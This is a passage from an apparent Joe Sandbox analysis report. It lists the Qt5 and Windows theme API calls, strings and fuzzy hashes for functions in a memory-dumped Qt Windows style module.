                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF221E3
                                                                                                                                                                                                                • ?setWindowOpacity@QWidget@@QEAAXN@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFAFDF17486), ref: 00007FFAFDF221F9
                                                                                                                                                                                                                • GetThemeInt.UXTHEME ref: 00007FFAFDF2226A
                                                                                                                                                                                                                • GetThemeInt.UXTHEME ref: 00007FFAFDF222CC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object@@$?cast@MetaV2@@$?setAttribute@ThemeWidget@@$?unpolish@Opacity@Qt@@_Style@@WidgetWidget@@@WindowWindows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2735554956-0
                                                                                                                                                                                                                • Opcode ID: 1c71dc3e056313195811e60779e2669fb24017bb2efddc10756f4374179b03c4
                                                                                                                                                                                                                • Instruction ID: 7620e34462f6b107dbe14ec0fbc97c8060badb5f3f35fae2149b861474f630e3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c71dc3e056313195811e60779e2669fb24017bb2efddc10756f4374179b03c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF51862160974282EB128B15E845A7973A0EB87BA2F449136D9BD4A7D4FF3CF050C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object$CreateSelect$CompatibleDeleteErrnoFlushReleaseSectionWarning@@
                                                                                                                                                                                                                • String ID: ($QWindowsXPStylePrivate::buffer(%dx%d), CreateDIBSection() did not allocate pixel data.$QWindowsXPStylePrivate::buffer(%dx%d), CreateDIBSection() failed.
                                                                                                                                                                                                                • API String ID: 2305749066-3376248037
                                                                                                                                                                                                                • Opcode ID: 27aa081f31339c52a13bd3d4865cff7320e74609e730d31c7ae89faaf26ccfdf
                                                                                                                                                                                                                • Instruction ID: 5fb1b13d0b7ddad446e261583cc9503f0238ae247cd1af8a9acc31c8fa21c73e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27aa081f31339c52a13bd3d4865cff7320e74609e730d31c7ae89faaf26ccfdf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD41A732A09B8593DB49CF21D9446A973A0FB8AB51F40803ADE7D1B790EF3CE064C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3958738658-0
                                                                                                                                                                                                                • Opcode ID: d8fb14a3419e0ca02b9ce3a66261e56d3238f1298a327cef6a8f29b00657608b
                                                                                                                                                                                                                • Instruction ID: 6f7521c52621dcd7c048ee119771e8f72704e534c680a85eeb2b24673c8b83f8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8fb14a3419e0ca02b9ce3a66261e56d3238f1298a327cef6a8f29b00657608b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E581C021E0C68386F7139B659441AB96290AF477A2F48C137D93C4FBD6FE3CE84587A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Painter@@$Pen@@$?center@?setBrush@@ColorColor@@Pen@Point@@Rect@@$?brush@?color@?darker@?draw?pen@Color@@@Group@1@Line@@Lines@Palette@@Pen@@@Role@1@@V0@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 996211440-0
                                                                                                                                                                                                                • Opcode ID: f1e66f458d7ebdc935b70beb53d6a2ba59356c5ea284e5fbede81212b0b2d28d
                                                                                                                                                                                                                • Instruction ID: 3ccfddda92c9581ac410a5bf1d84ad692fd1384b902565433b0a615671c4bd4d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1e66f458d7ebdc935b70beb53d6a2ba59356c5ea284e5fbede81212b0b2d28d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28317432A086428BD712CF29E40466AB7B0FB8AB65F408136DF6D4B798EF3CD445CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@ColorPalette@@$Color@@Style$Group@1@Option@@Style@@V0@@$?brush@?color@?darker@?draw?setBar@@BrushBrush@Brush@@@ControlControl@Element@OptionPainter@@Qt@@@Role@1@Role@1@@Style@ToolWidget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3512791070-0
                                                                                                                                                                                                                • Opcode ID: 073b32600f2e9aa024834d92725b403252bbcdc94fbc86fcf8c8f634f6836b3b
                                                                                                                                                                                                                • Instruction ID: 0ea0bc4ca69477f65410a8aea95d4095dc75ce4ca0295973aaa798969241d7d5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 073b32600f2e9aa024834d92725b403252bbcdc94fbc86fcf8c8f634f6836b3b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B218732615A8296DB21DF21DC54AED7330FB86B55F404132CA6E4B668EF3CE609C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String@@$GenericNativeObject@@$?invoke?platformApplication@@Argument@@Argument@@444444444@ConnectionInterface@Interface@@MetaMethod@PlatformQt@@ReturnType@
                                                                                                                                                                                                                • String ID: QString$createMessageWindow$void*
                                                                                                                                                                                                                • API String ID: 1666974659-152812606
                                                                                                                                                                                                                • Opcode ID: b5274aa86e8c04ae4bfcebe94bf25a91b7a3ad300792449d01cbe4597b60e837
                                                                                                                                                                                                                • Instruction ID: 8b048e6e683b583026f63d24b3fde47605bc049687d4e1923a1939eaff74788f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5274aa86e8c04ae4bfcebe94bf25a91b7a3ad300792449d01cbe4597b60e837
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C513132A14B91D5EB01CF74E8802EC73B0FB99358F505226EEAD56D58EF78D298C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: IsThemeActive.UXTHEME(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF25288
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: IsAppThemed.UXTHEME(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF25292
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: ?instance@QCoreApplication@@SAPEAV1@XZ.QT5CORE(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF2529C
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF25280: ?isDarkMode@QWindowsStylePrivate@@SA_NXZ.QT5WIDGETS(?,?,?,?,00007FFAFDF11952), ref: 00007FFAFDF252A7
                                                                                                                                                                                                                • ?subControlRect@QCommonStyle@@UEBA?AVQRect@@W4ComplexControl@QStyle@@PEBVQStyleOptionComplex@@W4SubControl@4@PEBVQWidget@@@Z.QT5WIDGETS ref: 00007FFAFDF18255
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: StyleStyle@@$?instance@?subActiveApplication@@CommonComplexComplex@@ControlControl@Control@4@CoreDarkMode@OptionPrivate@@Rect@Rect@@ThemeThemedWidget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2068351892-0
                                                                                                                                                                                                                • Opcode ID: 742f46889dbf73f2d4903ae9e6d5a78c539e9bd83f1960cdf00690fdfb9bb3f5
                                                                                                                                                                                                                • Instruction ID: daba6dbc18b4c413ddf3b9757f9cb9dffc007fd45847ed909cf67ad9813ae9db
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 742f46889dbf73f2d4903ae9e6d5a78c539e9bd83f1960cdf00690fdfb9bb3f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FD1F472E246418AE316CF74D540AAD77B0FB59768F00823BDE2D67B94EB38A481CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?isWindow@QWidget@@QEBA_NXZ.QT5WIDGETS ref: 00007FFAFDF23E6E
                                                                                                                                                                                                                • ?nativeMetricScaleFactor@QWindowsStylePrivate@@SANPEBVQWidget@@@Z.QT5WIDGETS ref: 00007FFAFDF23EED
                                                                                                                                                                                                                • GetThemePartSize.UXTHEME ref: 00007FFAFDF23F62
                                                                                                                                                                                                                • ?toPoint@QPointF@@QEBA?AVQPoint@@XZ.QT5CORE ref: 00007FFAFDF23FAA
                                                                                                                                                                                                                • ?standardPixmap@QWindowsStyle@@UEBA?AVQPixmap@@W4StandardPixmap@QStyle@@PEBVQStyleOption@@PEBVQWidget@@@Z.QT5WIDGETS ref: 00007FFAFDF23FC2
                                                                                                                                                                                                                • ??0QIcon@@QEAA@AEBVQPixmap@@@Z.QT5GUI ref: 00007FFAFDF23FCF
                                                                                                                                                                                                                • ?pixmap@QIcon@@QEBA?AVQPixmap@@AEBVQSize@@W4Mode@1@W4State@1@@Z.QT5GUI ref: 00007FFAFDF23FEA
                                                                                                                                                                                                                • ??1QIcon@@QEAA@XZ.QT5GUI ref: 00007FFAFDF23FF4
                                                                                                                                                                                                                • ??1QPixmap@@UEAA@XZ.QT5GUI ref: 00007FFAFDF23FFE
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?getHWNDForWidget@QApplicationPrivate@@SAPEAUHWND__@@PEBVQWidget@@@Z.QT5WIDGETS(?,00000004,00000002,?,?,00000000,00007FFAFDF197AA), ref: 00007FFAFDF21228
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?allWindows@QGuiApplication@@SA?AV?$QList@PEAVQWindow@@@@XZ.QT5GUI(?,00000004,00000002,?,?,00000000,00007FFAFDF197AA), ref: 00007FFAFDF21242
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?isTopLevel@QWindow@@QEBA_NXZ.QT5GUI ref: 00007FFAFDF21276
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?type@QWindow@@QEBA?AW4WindowType@Qt@@XZ.QT5GUI ref: 00007FFAFDF21283
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?handle@QWindow@@QEBAPEAVQPlatformWindow@@XZ.QT5GUI ref: 00007FFAFDF21291
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: GetDesktopWindow.USER32 ref: 00007FFAFDF212A9
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFAFDF212E3
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFAFDF21366
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFAFDF21376
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: OpenThemeData.UXTHEME ref: 00007FFAFDF213DD
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?toLocal8Bit@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE ref: 00007FFAFDF2140F
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?winId@QWindow@@QEBA_KXZ.QT5GUI ref: 00007FFAFDF21381
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: SetWindowTheme.UXTHEME ref: 00007FFAFDF21399
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?qErrnoWarning@@YAXPEBDZZ.QT5CORE ref: 00007FFAFDF213AA
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: DestroyWindow.USER32 ref: 00007FFAFDF213BC
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE ref: 00007FFAFDF21418
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ?qErrnoWarning@@YAXPEBDZZ.QT5CORE ref: 00007FFAFDF2142A
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFAFDF21438
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFDF211E0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFAFDF21446
                                                                                                                                                                                                                • ?standardPixmap@QWindowsStyle@@UEBA?AVQPixmap@@W4StandardPixmap@QStyle@@PEBVQStyleOption@@PEBVQWidget@@@Z.QT5WIDGETS ref: 00007FFAFDF24030
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window@@$Pixmap@Pixmap@@Style@@Widget@@@Window$Array@@ByteIcon@@StyleThemeWindows$?standardErrnoLogger@@MessageOption@@Private@@StandardString@@Warning@@$?all?const?dispose@?get?handle@?native?pixmap@?type@?warning@?winApplicationApplication@@Bit@D__@@DataData@Data@1@@Data@@DesktopDestroyFactor@Level@ListList@Local8MetricMode@1@OpenPartPixmap@@@PlatformPointPoint@Point@@Qt@@ScaleSizeSize@@State@1@@Type@Widget@Widget@@Window@Window@@@@Windows@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 926569356-0
                                                                                                                                                                                                                • Opcode ID: 3f763ed2f2f009e762b43256ef0c912e030b6c63674e5c8efbd41a157ef7f708
                                                                                                                                                                                                                • Instruction ID: de3eab50ee85b82224ff89fa9ef3d23b476a6eb59c2bece33f27e5ebdde98571
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f763ed2f2f009e762b43256ef0c912e030b6c63674e5c8efbd41a157ef7f708
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4518632E08B8185F722CB61D4017ED7370BF56799F048236DE6D66A94EF78914AC790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Region@@$Rect@@$V0@@$?begin@?end@A@$$Empty@RectRect@Rect@@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 766501983-0
                                                                                                                                                                                                                • Opcode ID: 2b575f04c89809ca2d2f3f453d690b2ad47a68f3a0532a7f5691c1563de4d2bb
                                                                                                                                                                                                                • Instruction ID: cc476182452ffa65d3acc4e26aa911696dc73e22b34e0c2aa645547e7452f60d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b575f04c89809ca2d2f3f453d690b2ad47a68f3a0532a7f5691c1563de4d2bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5512811D2DF8589E7139B31A4116B57324AFAB7D5F00C333ED6E7A6A4EF29A482C350
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE ref: 00007FFAFDF16F90
                                                                                                                                                                                                                • ?cast@QMetaObject@@QEBAPEBVQObject@@PEBV2@@Z.QT5CORE ref: 00007FFAFDF16FB5
                                                                                                                                                                                                                • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFAFDF16FE8
                                                                                                                                                                                                                • ?qt_qFindChild_helper@@YAPEAVQObject@@PEBV1@AEBVQString@@AEBUQMetaObject@@V?$QFlags@W4FindChildOption@Qt@@@@@Z.QT5CORE ref: 00007FFAFDF17003
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFAFDF17011
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object@@$MetaString@@$?cast@FindV2@@$?qt_qChildChild_helper@@Flags@Latin1Option@Qt@@@@@String@@@
                                                                                                                                                                                                                • String ID: qt_inputdlg_buttonbox$qt_msgbox_buttonbox
                                                                                                                                                                                                                • API String ID: 156075413-2438614642
                                                                                                                                                                                                                • Opcode ID: 56abeedf9c40ae234931bb1b7f121b55bdb4c33ff6ce831097e916c049966558
                                                                                                                                                                                                                • Instruction ID: daf3dcca63360285a8704775bdae1fd40f3d5780edf874e96c1f4ef0a51507e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56abeedf9c40ae234931bb1b7f121b55bdb4c33ff6ce831097e916c049966558
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67416532E08B8189F7128F78D8446E83770FB45769F109126DE6D1BAA5EF38E185C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Painter@@$Brush@@ColorPen@@$?brush@?draw?restore@?setGroup@1@JoinLine@@Lines@Palette@@Pen@Pen@@@Qt@@Role@1@@Style@Style@3@Style@3@@
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 758486232-2766056989
                                                                                                                                                                                                                • Opcode ID: ab156bc49428f8eb256dea7bddb167a917a123762e849364c4570bb14e841e77
                                                                                                                                                                                                                • Instruction ID: d2a240754099120b761859e8596f07626959cd5d6d4c5389449e78bc76143cb5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab156bc49428f8eb256dea7bddb167a917a123762e849364c4570bb14e841e77
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C11D27260864186D722CF15E00456EB7A0FB8A7B5F408132DFAE477A0EF3CE589CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Painter@@$Brush@@ColorPen@@$?brush@?draw?restore@?setGroup@1@JoinLine@@Lines@Palette@@Pen@Pen@@@Qt@@Role@1@@Style@Style@3@Style@3@@
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 758486232-2766056989
                                                                                                                                                                                                                • Opcode ID: f3406cae5ad64579441f3a47c4d15a6c7846e9acb22b47062c0f5e0da0898c6c
                                                                                                                                                                                                                • Instruction ID: d19a0dfc92ec09501178faac817132a2eaac0472eba6119ac0b0b32e21c15907
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3406cae5ad64579441f3a47c4d15a6c7846e9acb22b47062c0f5e0da0898c6c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9111D27260864186D722CF15E00456EB7A0FB8A7B5F408132DFAE477A0EF3CE589CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
